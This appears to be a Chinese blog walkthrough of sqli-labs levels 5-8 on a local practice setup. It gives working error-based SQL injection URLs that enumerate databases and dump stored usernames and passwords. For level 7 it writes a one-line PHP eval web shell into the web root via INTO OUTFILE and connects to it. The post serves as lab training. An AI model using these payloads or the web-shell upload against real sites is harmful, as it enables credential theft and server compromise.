<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"blank-admure.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="sqli-lbs Less-5~10关详解">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli-lbs Less-5~10关详解">
<meta property="og:url" content="https://blank-admure.github.io/2020/10/18/sqli-lbs%20Less-5~10%E5%85%B3%E8%AF%A6%E8%A7%A3/index.html">
<meta property="og:site_name" content="blank">
<meta property="og:description" content="sqli-lbs Less-5~10关详解">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022181429687.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022181542277.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022181615899.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020102218234937.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022183232337.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022183545927.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022183559915.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022183613927.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022183626214.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020102218363839.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022183709996.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022184227959.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022183917991.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022183930336.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022184052893.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022184348581.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022184401763.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022184412986.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022184428203.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020102218480543.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022184818628.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022184940489.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022184953108.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022185121178.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201022185203526.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020102219230550.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201027121843368.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201027121857795.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201027121913937.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201027121932444.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201027121950155.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201027122056951.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201027122112998.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201027122128716.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201027122158198.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201027122213724.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201027122242853.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201027122436141.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201027122513532.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201027122605969.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">
<meta property="article:published_time" content="2020-10-18T13:31:30.000Z">
<meta property="article:modified_time" content="2020-10-27T08:50:52.690Z">
<meta property="article:author" content="blank-admure">
<meta property="article:tag" content="sqli-labs">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20201022181429687.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center">

<link rel="canonical" href="https://blank-admure.github.io/2020/10/18/sqli-lbs%20Less-5~10%E5%85%B3%E8%AF%A6%E8%A7%A3/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>sqli-lbs Less-5~10关详解 | blank</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">blank</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://blank-admure.github.io/2020/10/18/sqli-lbs%20Less-5~10%E5%85%B3%E8%AF%A6%E8%A7%A3/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="blank-admure">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="blank">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sqli-lbs Less-5~10关详解
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-10-18 21:31:30" itemprop="dateCreated datePublished" datetime="2020-10-18T21:31:30+08:00">2020-10-18</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-10-27 16:50:52" itemprop="dateModified" datetime="2020-10-27T16:50:52+08:00">2020-10-27</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/sqli-labs/" itemprop="url" rel="index"><span itemprop="name">sqli-labs</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2020/10/18/sqli-lbs%20Less-5~10%E5%85%B3%E8%AF%A6%E8%A7%A3/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2020/10/18/sqli-lbs%20Less-5~10%E5%85%B3%E8%AF%A6%E8%A7%A3/" itemprop="commentCount"></span>
    </a>
  </span>
  
  
            <div class="post-description">sqli-lbs Less-5~10关详解</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="第五关：Double-Query-Single-Quotes-String"><a href="#第五关：Double-Query-Single-Quotes-String" class="headerlink" title="第五关：Double Query- Single Quotes- String"></a>第五关：Double Query- Single Quotes- String</h2><p><strong>1</strong>.输入?id=2看见页面如下:<br><img src="https://img-blog.csdnimg.cn/20201022181429687.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述">输入?id=666时，发现页面发生变化<br><img src="https://img-blog.csdnimg.cn/20201022181542277.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述">说明页面没有显示位。无法使用联合查询注入<br>2.接着我们尝试在URL中输入  ?id=2’ 页面出现错误语句如下<br><img src="https://img-blog.csdnimg.cn/20201022181615899.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述">但是可以发现存在注入点，这里可以闭合引号，随后通过查询列数发现这里也是3列<br>这道题使用的是报错注入<br><strong>2.**何为</strong>报错注入*<em>：<br>报错注入就是通过人为的引起数据库的报错，但是数据库在报错的同时会将查询的结果也呈现在报错中,我在这里介绍一下报错注入以及原理<br>这是网上使用最广泛的一句报错注入语句：<br>select count(</em>),(floor(rand(0)2))x from information_schema.tables group by x;<br>那么必须是要按这个句子来执行吗,或者必须要这些句子吗？<br>通过查找很多网站的资料，我总结出：<br>group by,rand(),floor()三个函数是必须存在的，缺一不可，并且rand(),rand(0)两个句子还是有一些区别的，其中rand()在两条数据以上随即报错,rand(0)在三条数据以上必报错<br>介绍三种报错注入常用的语句：</p>
<p>(1). 通过floor报错<br>and (select 1 from (select count(*),concat(( payload),floor (rand(0)*2))x from information_schema.tables group by x)a)<br>其中payload为你要插入的SQL语句<br>需要注意的是该语句将 输出字符长度限制为64个字</p>
<p>(2). 通过updatexml报错<br>and updatexml(1, payload,1)<br>同样该语句对输出的字符长度也做了限制，其最长输出32位<br>并且该语句对payload的反悔类型也做了限制，只有在payload返回的不是xml格式才会生</p>
<p>(3). 通过ExtractValue报错<br>and extractvalue(1, payload)<br>输出字符有长度限制，最长32位。</p>
<p>payload即我们要输入的sql查询语句</p>
<p>*<em>3.**构造如下语句：<a target="_blank" rel="noopener" href="http://127.0.0.1/Less-5/?id=2&#39;">http://127.0.0.1/Less-5/?id=2&#39;</a> and (select 1 from (select count(</em>),concat((select group_concat(schema_name) from information_schema.schemata),floor (rand()<em>2)) as x from information_schema.tables group by x) as a) –+<br><img src="https://img-blog.csdnimg.cn/2020102218234937.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>提示输出信息超过一行，说明这里数据库名组成的字符串长度超过了64位(group_concat()函数最大长度为64位)，所以需要放弃group_concat()函数，而使用limit 0,1来一个个输出。<br>limit 0,1 表示输出第一个数据。 0表示输出的起始位置，1表示跨度为1（即输出几个数据，1表示输出一个，2就表示输出两个）<br> 更改语句为:<a target="_blank" rel="noopener" href="http://127.0.0.1/Less-5/?id=2&#39;">http://127.0.0.1/Less-5/?id=2&#39;</a> and (select 1 from (select count(</em>),concat((select concat(schema_name,’;’) from information_schema.schemata limit 0,1),floor(rand()<em>2)) as x from information_schema.tables group by x) as a)–+<br><img src="https://img-blog.csdnimg.cn/20201022183232337.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述">**4.**继续爆其他数据库名，改变limit n,1即可：<a target="_blank" rel="noopener" href="http://127.0.0.1/Less-5/?id=2&#39;">http://127.0.0.1/Less-5/?id=2&#39;</a> and (select 1 from (select count(</em>),concat((select concat(schema_name,’;’) from information_schema.schemata limit 1,1),floor(rand()*2)) as x from information_schema.tables group by x) as a) –+</p>
<p><img src="https://img-blog.csdnimg.cn/20201022183545927.png#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201022183559915.png#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201022183613927.png#pic_center" alt="在这里插入图片描述"><img src="https://img-blog.csdnimg.cn/20201022183626214.png#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/2020102218363839.png#pic_center" alt="在这里插入图片描述"><br> 会发现到了n=6的时候就发生了变化:<br> <img src="https://img-blog.csdnimg.cn/20201022183709996.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述">当显示该情况时，说明已经爆完。<br><strong>5.</strong> 爆security数据库中的表：<br>构造：<a target="_blank" rel="noopener" href="http://127.0.0.1/Less-5/?id=2&#39;">http://127.0.0.1/Less-5/?id=2&#39;</a> and (select 1 from (select count(*),concat((select concat(table_name,’;’) from information_schema.tables where table_schema=’security’ limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a) –+ 还是更换limit n,1一个一个爆出。<br><img src="https://img-blog.csdnimg.cn/20201022184227959.png#pic_center" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20201022183917991.png#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201022183930336.png#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201022184052893.png#pic_center" alt="在这里插入图片描述"><br>*<em>6.**爆users表的列名：<a target="_blank" rel="noopener" href="http://127.0.0.1/Less-5/?id=2&#39;">http://127.0.0.1/Less-5/?id=2&#39;</a> and (select 1 from (select count(</em>),concat((select concat(column_name,’;’) from information_schema.columns where table_name=’users’ limit 0,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) –+<br><img src="https://img-blog.csdnimg.cn/20201022184348581.png#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201022184401763.png#pic_center" alt="在这里插入图片描述"><img src="https://img-blog.csdnimg.cn/20201022184412986.png#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201022184428203.png#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/2020102218480543.png#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201022184818628.png#pic_center" alt="在这里插入图片描述"></p>
<p>*<em>9.**爆users表中的内容:用户名和密码为，同样，limit n,1 慢慢来吧：<a target="_blank" rel="noopener" href="http://127.0.0.1/Less-5/?id=2&#39;">http://127.0.0.1/Less-5/?id=2&#39;</a> and(select 1 from (select count(</em>),concat((select concat(username,’: ‘,password,’;’) from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)–+</p>
<p><img src="https://img-blog.csdnimg.cn/20201022184940489.png#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201022184953108.png#pic_center" alt="在这里插入图片描述"><br>!<img src="https://img-blog.csdnimg.cn/20201022185121178.png#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201022185203526.png#pic_center" alt="在这里插入图片描述"></p>
<p> 除此之外还有好几个，我就不一一爆出了，一共14个用户名和密码，到了n=14就会发现爆完了。好啦，第五题就此完事🤭。</p>
<h2 id="第六关-Double-Query-Double-Quotes-String"><a href="#第六关-Double-Query-Double-Quotes-String" class="headerlink" title="第六关:Double Query- Double Quotes- String"></a>第六关:Double Query- Double Quotes- String</h2><p>第六关和第五关一样也没有数据回显，所以我们这里仍然使用报错注入<br>实现判断注入点，输入单引号没有报错，说明此处不是单引号型注入，尝试使用双引号，报错，所以此处使用双引号闭合来注入<br>?id=1 –+<br><img src="https://img-blog.csdnimg.cn/2020102219230550.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述">其余过程不再赘述，请参考第五关.</p>
<h2 id="第七关：Less-7-Dump-into-Outfile"><a href="#第七关：Less-7-Dump-into-Outfile" class="headerlink" title="第七关：Less-7 Dump into Outfile"></a>第七关：Less-7 Dump into Outfile</h2><p>第七关和上一关有所不同，这里说明了要使用outfile函数，outfile函数就是将数据库的查询内容导出到一个外部文件<br>1.我们正常输入?id=1页面回显如下<br><img src="https://img-blog.csdnimg.cn/20201027121843368.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述">2.当我们输入 and 1=2 页面显示依然正常，说明不是数值型注入<br><img src="https://img-blog.csdnimg.cn/20201027121857795.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述">3.当我们输入?id=1’页面报错，说明可能存在”注入<br><img src="https://img-blog.csdnimg.cn/20201027121913937.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述">4..当我们输入?id=1’ –+页面显示依然不正常<br><img src="https://img-blog.csdnimg.cn/20201027121932444.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"> 5.接着我们尝试?id=1’) –+，页面依然显示不正常，有点难受，不过没关系<br><img src="https://img-blog.csdnimg.cn/20201027121950155.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述">6.我们可以接着输入?id=5’))  –+尝试，发现页面回显正常<br><img src="https://img-blog.csdnimg.cn/20201027122056951.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"> 7. 由于本关卡提示我们使用file权限向服务器写入文件，我们就先尝试下写数据<br>由于我用的是phpstudy搭建的环境，所以我直接在我本机取一个目录就好<br>C:\phpStudy\PHPTutorial\MySQL\data<br><img src="https://img-blog.csdnimg.cn/20201027122112998.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"> 然后使用union select 1,2,3 into outfile “C:\phpStudy\PHPTutorial\MySQL\data\chao.php” 尝试写入文件。<br>然后去本机文件夹下查看文件是否写入成功。<br><img src="https://img-blog.csdnimg.cn/20201027122128716.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br> 写入成功了，但是文件名变成了如图红色表示的那样！！<br>接着我进行了好多次尝试，最后被同学告知，需要使用\来代替目录中的\ ，具体原因我也不知道，后续会补上。  命令如下：<br>union select 1,2,3 into outfile “C:\phpStudy\PHPTutorial\MySQL\data\chao.php”<br>文件导入成功!，接着我们查看chao.php的内容<br><img src="https://img-blog.csdnimg.cn/20201027122158198.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br> 需要注意的是利用数据库file权限向操作系统写入文件时， 对于相同文件名的文件不能覆盖，所以如果第一次上传chao.php，下次在上传chao.php，就是无效命令了，也就是新的chao,php中的内容并不会覆盖，之前的chao.php</p>
<p>我们再尝试上传一句话木马，具体命令<br>?id=-1’))  union select 1,”<?php @eval($_POST['chopper']);?>“,3 into outfile “C:\phpStudy\PHPTutorial\WWW\123456.php” –+<br>接着试着访问一下这个文件<br><img src="https://img-blog.csdnimg.cn/20201027122213724.png#pic_center" alt="在这里插入图片描述">上传成功，使用菜刀链接下 </p>
<p><img src="https://img-blog.csdnimg.cn/20201027122242853.png#pic_center" alt="在这里插入图片描述">连接成功！！！！🤭</p>
<h2 id="第八关-Blind-Boolian-Single-Quotes-String"><a href="#第八关-Blind-Boolian-Single-Quotes-String" class="headerlink" title="第八关: Blind- Boolian- Single Quotes- String"></a>第八关: Blind- Boolian- Single Quotes- String</h2><p>1.?id=2’ –+ 页面回显正常，不赘述了，这里是单引号字符型注入 </p>
<p><img src="https://img-blog.csdnimg.cn/20201027122436141.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"> 2.页面没有显示位，没有数据库报错信息。<br>我们先尝试一下是否有file权限<br><a target="_blank" rel="noopener" href="http://127.0.0.1/sqli-labs/Less-8/?id=2&#39;">http://127.0.0.1/sqli-labs/Less-8/?id=2&#39;</a> union select 1,2,3 into outfile “C:\phpStudy\PHPTutorial\WWW\88888.php”–+<br>上传成功 </p>
<p><img src="https://img-blog.csdnimg.cn/20201027122513532.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p>
